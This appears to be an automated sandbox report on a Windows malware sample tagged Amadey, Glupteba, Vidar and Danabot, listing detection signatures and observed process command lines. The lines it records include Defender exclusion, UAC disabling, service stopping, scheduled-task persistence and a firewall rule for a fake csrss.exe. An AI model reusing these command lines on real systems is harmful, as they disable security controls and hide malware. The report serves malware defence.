Malware Analysis Report

2025-01-02 08:51

Sample ID 231005-fe8arsgg21
Target 831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf
SHA256 831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf
Tags
upx amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan discovery persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf

Threat Level: Known bad

The file 831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf was found to be: Known bad.

Malicious Activity Summary

upx amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan discovery persistence

Amadey

UAC bypass

Glupteba

Vidar

Fabookie

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba payload

Detect Fabookie payload

Danabot

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Drops file in Drivers directory

Stops running service(s)

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

UPX packed file

Loads dropped DLL

.NET Reactor proctector

Drops startup file

Reads user/profile data of web browsers

Enumerates connected drives

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Accesses 2FA software files, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

System policy modification

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Modifies registry class

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 04:48

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 04:48

Reported

2023-10-05 04:53

Platform

win7-20230831-en

Max time kernel

17s

Max time network

302s

Command Line

"C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A

Vidar

stealer vidar

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PY3tcgMmfV1lS7OkmXaJAVEH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCfiJFuKL8d9HciZDKYtNtC6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\97jhqAIEmEg7zLecztkBAIGO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BSyRb5R7CY3OOWCeKdX6PFkF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jVeDW0t4u5Uf98hUszP3BxTp.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7vs62cs0Bye0UAhFm1ALwmy8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E4hrlmGeVSJNTcSiMjHRgijk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qrwHqeBVAj8d0CAicxnWXqjU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n9GhocBAIciK8bKf7qmAAhsE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COM9NUP81TFb8d6dL14WTtha.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G3X4AVMGssvwhQb2ZwQ0bYsS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2964 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2964 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2108 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe
PID 2108 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe
PID 2108 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe
PID 2108 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe
PID 2108 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe
PID 2108 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe
PID 2108 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe
PID 2108 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\netsh.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe
PID 2108 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe
PID 2108 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe
PID 2108 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe
PID 2108 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe
PID 2108 wrote to memory of 304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe
PID 2108 wrote to memory of 304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe
PID 2108 wrote to memory of 304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe
PID 2108 wrote to memory of 304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe
PID 2108 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe
PID 2108 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe
PID 2108 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe
PID 2108 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe
PID 2108 wrote to memory of 2212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe
PID 2108 wrote to memory of 2212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe
PID 2108 wrote to memory of 2212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe
PID 2108 wrote to memory of 2212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe
PID 2108 wrote to memory of 1408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe
PID 2108 wrote to memory of 1408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe
PID 2108 wrote to memory of 1408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe
PID 2108 wrote to memory of 1408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe

"C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe

"C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe"

C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe

"C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe"

C:\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe

"C:\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe"

C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe

"C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe" --silent --allusers=0

C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe

"C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe"

C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe

"C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe"

C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe

"C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe"

C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe

"C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe"

C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

"C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe"

C:\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe

"C:\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\is-K1DN3.tmp\zderJRyjOZCRyK26wvChSu1Z.tmp

"C:\Users\Admin\AppData\Local\Temp\is-K1DN3.tmp\zderJRyjOZCRyK26wvChSu1Z.tmp" /SL5="$601FA,491750,408064,C:\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-A70L0.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3205974479.exe"

C:\Users\Admin\AppData\Local\Temp\3205974479.exe

"C:\Users\Admin\AppData\Local\Temp\3205974479.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "jgfkLelS1zBc0X92tt2RvHBK.exe" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "jgfkLelS1zBc0X92tt2RvHBK.exe" /f & erase "C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe" & exit

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {6D207BC8-A3EB-4946-A6D8-58461BD89B10} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]

C:\Program Files\7-Zip\OLXZCKNGJG\lightcleaner.exe

"C:\Program Files\7-Zip\OLXZCKNGJG\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\is-QIOCJ.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QIOCJ.tmp\lightcleaner.tmp" /SL5="$301DC,833775,56832,C:\Program Files\7-Zip\OLXZCKNGJG\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\87-db9bc-d64-cf58c-d80f60cdbaba5\Hamysulydu.exe

"C:\Users\Admin\AppData\Local\Temp\87-db9bc-d64-cf58c-d80f60cdbaba5\Hamysulydu.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 396

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005044902.log C:\Windows\Logs\CBS\CbsPersist_20231005044902.cab

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2

C:\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe

"C:\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe"

C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

"C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\3205974479.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

